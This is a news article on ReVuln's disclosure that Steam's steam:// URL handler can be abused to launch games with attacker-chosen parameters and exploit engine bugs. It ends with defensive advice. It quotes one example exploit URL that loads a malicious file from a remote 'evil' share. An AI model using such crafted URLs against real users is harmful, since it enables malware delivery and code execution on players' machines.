Steam Browser Protocol Open to Remote Attacks
Steam is prone to attacks that exploit its vulnerable URL handler, the protocol used to integrate web-based functionalities in the Steam platform, say ReVuln security researchers in a paper published this week.
The flaw lies in the way Steam interacts with, for instance, games, web browsers or e-mail clients. The URL handler is used to install, uninstall or launch games, create backups, validate or defrag game files, connect to game servers, download tools or read news.
By getting the user to click a specially crafted URL starting with steam://, an attacker can make a player unknowingly access and download malware. With some social engineering, attackers can easily manipulate players into hitting a link provided on social networking or micro blogging platforms.
In their paper, ReVuln researchers give a few examples of such game exploitation. For instance, in the case of games based on the Unreal Engine9 they write “we opted for exploiting a real security vulnerability that occurs while loading content that resides on remote computers (Windows remote WebDAV or SMB share) which we can load via command-line parameters: steam://run/ID/server nnHOSTnevil.upk -silent. Indeed this engine is affected by many integer overflow vulnerabilities that allow execution of malicious code.”
“This is a completely new attack vector, so it’s not related to a single game,” Donato Ferrante, co-founder and security researcher with ReVuln told arstechnica.com. “Most of the games on Steam share the same game engine. Once attackers have identified a vulnerability in one of the engines, they can use the Steam protocol to exploit it.”
However, not all gamers are likely in danger. When stumbling upon external URL protocols (such as steam://), Chrome and Internet Explorer prompt a detailed warning and let users know they are about to access an external program; Firefox only asks players for confirmation. In the meantime, most other browsers execute directly the link without warning.
Also exposed to this threat are users who changed the default configuration of their browser to annul warning messages and prompts. This way it’s impossible to tell how many players are at risk.
Attacks can be carried out without user intervention if Steam is running in the background and the player uses a vulnerable browser.
In order to be protected, users need to disable automatic launching of a steam:// URLs and keep an eye on any links that seem suspicious and try to launch Steam.